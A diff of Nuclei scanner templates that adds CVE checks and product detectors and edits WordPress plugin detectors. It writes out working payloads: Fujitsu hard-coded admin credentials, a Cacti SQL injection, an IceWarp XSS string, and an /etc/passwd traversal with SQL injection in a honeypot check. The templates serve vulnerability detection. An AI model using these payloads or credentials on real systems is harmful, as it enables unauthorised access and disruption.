part: interactsh_protocol # Confirms the HTTP Interaction part: interactsh_protocol # Confirms the HTTP Interaction

View File

@ -0,0 +1,50 @@
id: CVE-2023-38433
info:
name: Fujitsu IP Series - Hardcoded Credentials
author: AdnaneKhan
severity: high
description: |
Fujitsu Real-time Video Transmission Gear “IP series” use hard-coded credentials, which may allow a remote unauthenticated attacker to initialize or reboot the products, and as a result, terminate the video transmission. The credentials cannot be changed by the end-user and provide administrative access to the devices.
reference:
- https://www.praetorian.com/blog/fujitsu-ip-series-hard-coded-credentials
- https://nvd.nist.gov/vuln/detail/CVE-2023-38433
- https://www.cisa.gov/news-events/ics-advisories/icsa-23-248-01
- https://www.fujitsu.com/global/products/computing/peripheral/video/download
- https://jvn.jp/en/jp/JVN95727578
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
cvss-score: 7.5
cwe-id: CWE-798
metadata:
max-req: 1
max-request: 2
shodan-query: '"Server: thttpd/2.25b 29dec2003" content-length:1133'
verified: true
tags: cve,cve2023,fujitsu,ip-series
http:
- raw:
- |
GET /b_download/index.html HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64(username + ':' + password)}}
attack: pitchfork
payloads:
username:
- fedish264pro
- fedish265pro
password:
- h264pro@broadsight
- h265pro@broadsight
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Field Support'
- type: status
status:
- 200

View File

@ -0,0 +1,36 @@
id: CVE-2023-39361
info:
name: Cacti 1.2.24 - SQL Injection
author: ritikchaddha
severity: critical
description: |
Cacti is an open source operational monitoring and fault management framework. Affected versions are subject to a SQL injection discovered in graph_view.php. Since guest users can access graph_view.php without authentication by default, if guest users are being utilized in an enabled state, there could be the potential for significant damage. Attackers may exploit this vulnerability, and there may be possibilities for actions such as the usurpation of administrative privileges or remote code execution. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability.
reference:
- https://github.com/Cacti/cacti/security/advisories/GHSA-6r43-q2fw-5wrg
- https://nvd.nist.gov/vuln/detail/CVE-2023-39361
classification:
cve-id: CVE-2023-39361
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cwe-id: CWE-89
metadata:
max-request: 1
verified: true
shodan-query: title:"Login to Cacti"
tags: cve,cve2023,cacti,sqli
http:
- raw:
- |
@timeout: 20s
GET /graph_view.php?action=tree_content&node=1-1-tree_anchor&rfilter=%22or+%22%22%3D%22%28%28%22%29%29%3BSELECT+SLEEP%2810%29%3B--+- HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=10'
- 'status_code == 200'
- 'contains_all(body, "Tree Mode", "cacti")'
condition: and

View File

@ -0,0 +1,47 @@
id: CVE-2023-39600
info:
name: IceWarp 11.4.6.0 - Cross-Site Scripting
author: Imjust0
severity: medium
description: |
IceWarp 11.4.6.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.
reference:
- https://medium.com/@katikitala.sushmitha078/cross-site-scripting-reflected-xss-in-icewarp-server-cve-2023-39600-310a7e1c8817
- https://nvd.nist.gov/vuln/detail/CVE-2023-39600
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-39600
cwe-id: CWE-79
epss-score: 0.0046
cpe: cpe:2.3:a:icewarp:icewarp_server:*:*:*:*:*:*:*:*
epss-percentile: 0.72232
metadata:
max-request: 1
shodan-query: title:"icewarp"
vendor: icewarp
product: icewarp_server
tags: cve,cve2023,icewarp,xss
http:
- method: GET
path:
- '{{BaseURL}}/webmail/?color="><img src=x onerror=confirm(document.domain)>'
matchers-condition: and
matchers:
- type: word
words:
- "<img src=x onerror=confirm(document.domain)>"
- "IceWarp"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

View File

@ -0,0 +1,35 @@
id: dxplanning-panel
info:
name: DXPlanning Panel - Detect
author: righettod
severity: info
description: |
DXPlanning was detected.
reference:
- https://www.dedalus.com/fr/wp-content/uploads/sites/13/2022/05/Catalogue-formations-DxCare-2022.pdf
metadata:
max-request: 1
verified: true
tags: panel,dxplanning,login,detect
http:
- method: GET
path:
- '{{BaseURL}}/DxPlanning/WebBooking/Version'
matchers-condition: and
matchers:
- type: dsl
dsl:
- "contains(tolower(body), 'dxplanning/webbooking/')"
- "contains(body, 'Webbooking</title>')"
- "status_code==200"
condition: and
extractors:
- type: regex
part: body
group: 1
regex:
- '<td>([0-9.]+)</td>'

View File

@ -0,0 +1,47 @@
id: seafile-api
info:
name: Seafile API - Detect
author: righettod
severity: info
description: |
Seafile API was detected.
reference:
- https://download.seafile.com/published/web-api/home.md
- https://manual.seafile.com/
- https://www.seafile.com/en/home/
metadata:
max-request: 1
verified: true
shodan-query: http.html:"seafile"
tags: exposure,api,detect
http:
- method: GET
path:
- '{{BaseURL}}/api2/server-info/'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'seafile-basic'
- 'seafile-pro'
condition: or
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '"version":\s*"([0-9.]+)"'

View File

@ -2,7 +2,7 @@ id: shopify-takeover
info: info:
name: shopify takeover detection name: shopify takeover detection
author: pdteam,philippedelteil author: pdteam,philippedelteil,Imjust0
severity: high severity: high
reference: reference:
- https://medium.com/@thebuckhacker/how-to-do-55-000-subdomain-takeover-in-a-blink-of-an-eye-a94954c3fc75 - https://medium.com/@thebuckhacker/how-to-do-55-000-subdomain-takeover-in-a-blink-of-an-eye-a94954c3fc75
@ -28,6 +28,7 @@ http:
words: words:
- 'To finish setting up your new web address, go to your domain settings, click "Connect existing domain"' - 'To finish setting up your new web address, go to your domain settings, click "Connect existing domain"'
- "Sorry, this shop is currently unavailable." - "Sorry, this shop is currently unavailable."
- "Sorry, this store is currently unavailable."
condition: or condition: or
- type: word - type: word

View File

@ -0,0 +1,42 @@
id: burp-collaborator-detect
info:
name: Burp Collaborator Server - Detect
author: lum8rjack
severity: info
description: |
Burp Collaborator server detected.
reference:
- https://portswigger.net/burp/documentation/collaborator
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
max-request: 1
verified: true
shodan-query: "Server: Burp Collaborator"
tags: burp,tech,detect
http:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: header
words:
- "Server: Burp Collaborator https://burpcollaborator.net/"
- type: status
status:
- 200
extractors:
- type: regex
part: header
group: 1
regex:
- "(?:X-(Collaborator-Version: [0-9]))"

View File

@ -0,0 +1,34 @@
id: honeypot-detect
info:
name: Honeypot Detection
author: j4vaovo
severity: info
description: |
Honeypot was Detected.
reference:
- https://github.com/zema1/yarx
metadata:
max-request: 1
tags: honeypot,tech,cti
variables:
rand1: "{{randstr}}"
rand2: "{{rand_int(11111, 99999)}}"
rand3: "{{randstr}}"
http:
- method: GET
path:
- "{{BaseURL}}/?{{rand1}}=../../../../../../../../etc/passwd&{{rand3}}=1%20and%20updatexml(1,concat(0x7e,(select%20md5({{rand2}}))),1)"
matchers-condition: or
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: word
part: body
words:
- '{{md5({{rand2}})}}'

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/ad-inserter/ - https://wordpress.org/plugins/ad-inserter/
metadata: metadata:
max-request: 1
plugin_namespace: ad-inserter plugin_namespace: ad-inserter
wpscan: https://wpscan.com/plugin/ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter
tags: tech,wordpress,wp-plugin,top-200 tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/add-to-any/ - https://wordpress.org/plugins/add-to-any/
metadata: metadata:
max-request: 1
plugin_namespace: add-to-any plugin_namespace: add-to-any
wpscan: https://wpscan.com/plugin/add-to-any wpscan: https://wpscan.com/plugin/add-to-any
tags: tech,wordpress,wp-plugin,top-200 tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/admin-menu-editor/ - https://wordpress.org/plugins/admin-menu-editor/
metadata: metadata:
max-request: 1
plugin_namespace: admin-menu-editor plugin_namespace: admin-menu-editor
wpscan: https://wpscan.com/plugin/admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor
tags: tech,wordpress,wp-plugin,top-200 tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/advanced-custom-fields/ - https://wordpress.org/plugins/advanced-custom-fields/
metadata: metadata:
max-request: 1
plugin_namespace: advanced-custom-fields plugin_namespace: advanced-custom-fields
wpscan: https://wpscan.com/plugin/advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields
tags: tech,wordpress,wp-plugin,top-100,top-200 tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/akismet/ - https://wordpress.org/plugins/akismet/
metadata: metadata:
max-request: 1
plugin_namespace: akismet plugin_namespace: akismet
wpscan: https://wpscan.com/plugin/akismet wpscan: https://wpscan.com/plugin/akismet
tags: tech,wordpress,wp-plugin,top-100,top-200 tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/all-404-redirect-to-homepage/ - https://wordpress.org/plugins/all-404-redirect-to-homepage/
metadata: metadata:
max-request: 1
plugin_namespace: all-404-redirect-to-homepage plugin_namespace: all-404-redirect-to-homepage
wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage
tags: tech,wordpress,wp-plugin,top-200 tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/all-in-one-seo-pack/ - https://wordpress.org/plugins/all-in-one-seo-pack/
metadata: metadata:
max-request: 1
plugin_namespace: all-in-one-seo-pack plugin_namespace: all-in-one-seo-pack
wpscan: https://wpscan.com/plugin/all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack
tags: tech,wordpress,wp-plugin,top-100,top-200 tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/all-in-one-wp-migration/ - https://wordpress.org/plugins/all-in-one-wp-migration/
metadata: metadata:
max-request: 1
plugin_namespace: all-in-one-wp-migration plugin_namespace: all-in-one-wp-migration
wpscan: https://wpscan.com/plugin/all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration
tags: tech,wordpress,wp-plugin,top-100,top-200 tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
metadata: metadata:
max-request: 1
plugin_namespace: all-in-one-wp-security-and-firewall plugin_namespace: all-in-one-wp-security-and-firewall
wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall
tags: tech,wordpress,wp-plugin,top-100,top-200 tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/amp/ - https://wordpress.org/plugins/amp/
metadata: metadata:
max-request: 1
plugin_namespace: amp plugin_namespace: amp
wpscan: https://wpscan.com/plugin/amp wpscan: https://wpscan.com/plugin/amp
tags: tech,wordpress,wp-plugin,top-200 tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/antispam-bee/ - https://wordpress.org/plugins/antispam-bee/
metadata: metadata:
max-request: 1
plugin_namespace: antispam-bee plugin_namespace: antispam-bee
wpscan: https://wpscan.com/plugin/antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee
tags: tech,wordpress,wp-plugin,top-100,top-200 tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/astra-sites/ - https://wordpress.org/plugins/astra-sites/
metadata: metadata:
max-request: 1
plugin_namespace: astra-sites plugin_namespace: astra-sites
wpscan: https://wpscan.com/plugin/astra-sites wpscan: https://wpscan.com/plugin/astra-sites
tags: tech,wordpress,wp-plugin,top-100,top-200 tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/astra-widgets/ - https://wordpress.org/plugins/astra-widgets/
metadata: metadata:
max-request: 1
plugin_namespace: astra-widgets plugin_namespace: astra-widgets
wpscan: https://wpscan.com/plugin/astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets
tags: tech,wordpress,wp-plugin,top-200 tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/autoptimize/ - https://wordpress.org/plugins/autoptimize/
metadata: metadata:
max-request: 1
plugin_namespace: autoptimize plugin_namespace: autoptimize
wpscan: https://wpscan.com/plugin/autoptimize wpscan: https://wpscan.com/plugin/autoptimize
tags: tech,wordpress,wp-plugin,top-100,top-200 tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/backwpup/ - https://wordpress.org/plugins/backwpup/
metadata: metadata:
max-request: 1
plugin_namespace: backwpup plugin_namespace: backwpup
wpscan: https://wpscan.com/plugin/backwpup wpscan: https://wpscan.com/plugin/backwpup
tags: tech,wordpress,wp-plugin,top-100,top-200 tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/better-search-replace/ - https://wordpress.org/plugins/better-search-replace/
metadata: metadata:
max-request: 1
plugin_namespace: better-search-replace plugin_namespace: better-search-replace
wpscan: https://wpscan.com/plugin/better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace
tags: tech,wordpress,wp-plugin,top-100,top-200 tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/better-wp-security/ - https://wordpress.org/plugins/better-wp-security/
metadata: metadata:
max-request: 1
plugin_namespace: better-wp-security plugin_namespace: better-wp-security
wpscan: https://wpscan.com/plugin/better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security
tags: tech,wordpress,wp-plugin,top-100,top-200 tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/black-studio-tinymce-widget/ - https://wordpress.org/plugins/black-studio-tinymce-widget/
metadata: metadata:
max-request: 1
plugin_namespace: black-studio-tinymce-widget plugin_namespace: black-studio-tinymce-widget
wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget
tags: tech,wordpress,wp-plugin,top-200 tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/breadcrumb-navxt/ - https://wordpress.org/plugins/breadcrumb-navxt/
metadata: metadata:
max-request: 1
plugin_namespace: breadcrumb-navxt plugin_namespace: breadcrumb-navxt
wpscan: https://wpscan.com/plugin/breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt
tags: tech,wordpress,wp-plugin,top-100,top-200 tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/breeze/ - https://wordpress.org/plugins/breeze/
metadata: metadata:
max-request: 1
plugin_namespace: breeze plugin_namespace: breeze
wpscan: https://wpscan.com/plugin/breeze wpscan: https://wpscan.com/plugin/breeze
tags: tech,wordpress,wp-plugin,top-200 tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/broken-link-checker/ - https://wordpress.org/plugins/broken-link-checker/
metadata: metadata:
max-request: 1
plugin_namespace: broken-link-checker plugin_namespace: broken-link-checker
wpscan: https://wpscan.com/plugin/broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker
tags: tech,wordpress,wp-plugin,top-100,top-200 tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/child-theme-configurator/ - https://wordpress.org/plugins/child-theme-configurator/
metadata: metadata:
max-request: 1
plugin_namespace: child-theme-configurator plugin_namespace: child-theme-configurator
wpscan: https://wpscan.com/plugin/child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator
tags: tech,wordpress,wp-plugin,top-200 tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/classic-editor/ - https://wordpress.org/plugins/classic-editor/
metadata: metadata:
max-request: 1
plugin_namespace: classic-editor plugin_namespace: classic-editor
wpscan: https://wpscan.com/plugin/classic-editor wpscan: https://wpscan.com/plugin/classic-editor
tags: tech,wordpress,wp-plugin,top-100,top-200 tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/classic-widgets/ - https://wordpress.org/plugins/classic-widgets/
metadata: metadata:
max-request: 1
plugin_namespace: classic-widgets plugin_namespace: classic-widgets
wpscan: https://wpscan.com/plugin/classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets
tags: tech,wordpress,wp-plugin,top-100,top-200 tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/click-to-chat-for-whatsapp/ - https://wordpress.org/plugins/click-to-chat-for-whatsapp/
metadata: metadata:
max-request: 1
plugin_namespace: click-to-chat-for-whatsapp plugin_namespace: click-to-chat-for-whatsapp
wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp
tags: tech,wordpress,wp-plugin,top-200 tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/cmb2/ - https://wordpress.org/plugins/cmb2/
metadata: metadata:
max-request: 1
plugin_namespace: cmb2 plugin_namespace: cmb2
wpscan: https://wpscan.com/plugin/cmb2 wpscan: https://wpscan.com/plugin/cmb2
tags: tech,wordpress,wp-plugin,top-200 tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/coblocks/ - https://wordpress.org/plugins/coblocks/
metadata: metadata:
max-request: 1
plugin_namespace: coblocks plugin_namespace: coblocks
wpscan: https://wpscan.com/plugin/coblocks wpscan: https://wpscan.com/plugin/coblocks
tags: tech,wordpress,wp-plugin,top-200 tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/code-snippets/ - https://wordpress.org/plugins/code-snippets/
metadata: metadata:
max-request: 1
plugin_namespace: code-snippets plugin_namespace: code-snippets
wpscan: https://wpscan.com/plugin/code-snippets wpscan: https://wpscan.com/plugin/code-snippets
tags: tech,wordpress,wp-plugin,top-100,top-200 tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/coming-soon/ - https://wordpress.org/plugins/coming-soon/
metadata: metadata:
max-request: 1
plugin_namespace: coming-soon plugin_namespace: coming-soon
wpscan: https://wpscan.com/plugin/coming-soon wpscan: https://wpscan.com/plugin/coming-soon
tags: tech,wordpress,wp-plugin,top-100,top-200 tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/complianz-gdpr/ - https://wordpress.org/plugins/complianz-gdpr/
metadata: metadata:
max-request: 1
plugin_namespace: complianz-gdpr plugin_namespace: complianz-gdpr
wpscan: https://wpscan.com/plugin/complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr
tags: tech,wordpress,wp-plugin,top-100,top-200 tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/contact-form-7-honeypot/ - https://wordpress.org/plugins/contact-form-7-honeypot/
metadata: metadata:
max-request: 1
plugin_namespace: contact-form-7-honeypot plugin_namespace: contact-form-7-honeypot
wpscan: https://wpscan.com/plugin/contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot
tags: tech,wordpress,wp-plugin,top-200 tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/contact-form-7/ - https://wordpress.org/plugins/contact-form-7/
metadata: metadata:
max-request: 1
plugin_namespace: contact-form-7 plugin_namespace: contact-form-7
wpscan: https://wpscan.com/plugin/contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7
tags: tech,wordpress,wp-plugin,top-100,top-200 tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/contact-form-cfdb7/ - https://wordpress.org/plugins/contact-form-cfdb7/
metadata: metadata:
max-request: 1
plugin_namespace: contact-form-cfdb7 plugin_namespace: contact-form-cfdb7
wpscan: https://wpscan.com/plugin/contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7
tags: tech,wordpress,wp-plugin,top-200 tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/cookie-law-info/ - https://wordpress.org/plugins/cookie-law-info/
metadata: metadata:
max-request: 1
plugin_namespace: cookie-law-info plugin_namespace: cookie-law-info
wpscan: https://wpscan.com/plugin/cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info
tags: tech,wordpress,wp-plugin,top-100,top-200 tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/cookie-notice/ - https://wordpress.org/plugins/cookie-notice/
metadata: metadata:
max-request: 1
plugin_namespace: cookie-notice plugin_namespace: cookie-notice
wpscan: https://wpscan.com/plugin/cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice
tags: tech,wordpress,wp-plugin,top-100,top-200 tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/creame-whatsapp-me/ - https://wordpress.org/plugins/creame-whatsapp-me/
metadata: metadata:
max-request: 1
plugin_namespace: creame-whatsapp-me plugin_namespace: creame-whatsapp-me
wpscan: https://wpscan.com/plugin/creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me
tags: tech,wordpress,wp-plugin,top-200 tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/creative-mail-by-constant-contact/ - https://wordpress.org/plugins/creative-mail-by-constant-contact/
metadata: metadata:
max-request: 1
plugin_namespace: creative-mail-by-constant-contact plugin_namespace: creative-mail-by-constant-contact
wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact
tags: tech,wordpress,wp-plugin,top-100,top-200 tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/custom-css-js/ - https://wordpress.org/plugins/custom-css-js/
metadata: metadata:
max-request: 1
plugin_namespace: custom-css-js plugin_namespace: custom-css-js
wpscan: https://wpscan.com/plugin/custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js
tags: tech,wordpress,wp-plugin,top-200 tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/custom-fonts/ - https://wordpress.org/plugins/custom-fonts/
metadata: metadata:
max-request: 1
plugin_namespace: custom-fonts plugin_namespace: custom-fonts
wpscan: https://wpscan.com/plugin/custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts
tags: tech,wordpress,wp-plugin,top-200 tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/custom-post-type-ui/ - https://wordpress.org/plugins/custom-post-type-ui/
metadata: metadata:
max-request: 1
plugin_namespace: custom-post-type-ui plugin_namespace: custom-post-type-ui
wpscan: https://wpscan.com/plugin/custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui
tags: tech,wordpress,wp-plugin,top-100,top-200 tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/disable-comments/ - https://wordpress.org/plugins/disable-comments/
metadata: metadata:
max-request: 1
plugin_namespace: disable-comments plugin_namespace: disable-comments
wpscan: https://wpscan.com/plugin/disable-comments wpscan: https://wpscan.com/plugin/disable-comments
tags: tech,wordpress,wp-plugin,top-100,top-200 tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/disable-gutenberg/ - https://wordpress.org/plugins/disable-gutenberg/
metadata: metadata:
max-request: 1
plugin_namespace: disable-gutenberg plugin_namespace: disable-gutenberg
wpscan: https://wpscan.com/plugin/disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg
tags: tech,wordpress,wp-plugin,top-100,top-200 tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/duplicate-page/ - https://wordpress.org/plugins/duplicate-page/
metadata: metadata:
max-request: 1
plugin_namespace: duplicate-page plugin_namespace: duplicate-page
wpscan: https://wpscan.com/plugin/duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page
tags: tech,wordpress,wp-plugin,top-100,top-200 tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/duplicate-post/ - https://wordpress.org/plugins/duplicate-post/
metadata: metadata:
max-request: 1
plugin_namespace: duplicate-post plugin_namespace: duplicate-post
wpscan: https://wpscan.com/plugin/duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post
tags: tech,wordpress,wp-plugin,top-100,top-200 tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/duplicator/ - https://wordpress.org/plugins/duplicator/
metadata: metadata:
max-request: 1
plugin_namespace: duplicator plugin_namespace: duplicator
wpscan: https://wpscan.com/plugin/duplicator wpscan: https://wpscan.com/plugin/duplicator
tags: tech,wordpress,wp-plugin,top-100,top-200 tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/duracelltomi-google-tag-manager/ - https://wordpress.org/plugins/duracelltomi-google-tag-manager/
metadata: metadata:
max-request: 1
plugin_namespace: duracelltomi-google-tag-manager plugin_namespace: duracelltomi-google-tag-manager
wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager
tags: tech,wordpress,wp-plugin,top-100,top-200 tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/easy-fancybox/ - https://wordpress.org/plugins/easy-fancybox/
metadata: metadata:
max-request: 1
plugin_namespace: easy-fancybox plugin_namespace: easy-fancybox
wpscan: https://wpscan.com/plugin/easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox
tags: tech,wordpress,wp-plugin,top-200 tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/easy-table-of-contents/ - https://wordpress.org/plugins/easy-table-of-contents/
metadata: metadata:
max-request: 1
plugin_namespace: easy-table-of-contents plugin_namespace: easy-table-of-contents
wpscan: https://wpscan.com/plugin/easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents
tags: tech,wordpress,wp-plugin,top-200 tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/easy-wp-smtp/ - https://wordpress.org/plugins/easy-wp-smtp/
metadata: metadata:
max-request: 1
plugin_namespace: easy-wp-smtp plugin_namespace: easy-wp-smtp
wpscan: https://wpscan.com/plugin/easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp
tags: tech,wordpress,wp-plugin,top-200 tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/elementor/ - https://wordpress.org/plugins/elementor/
metadata: metadata:
max-request: 1
plugin_namespace: elementor plugin_namespace: elementor
wpscan: https://wpscan.com/plugin/elementor wpscan: https://wpscan.com/plugin/elementor
tags: tech,wordpress,wp-plugin,top-100,top-200 tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/elementskit-lite/ - https://wordpress.org/plugins/elementskit-lite/
metadata: metadata:
max-request: 1
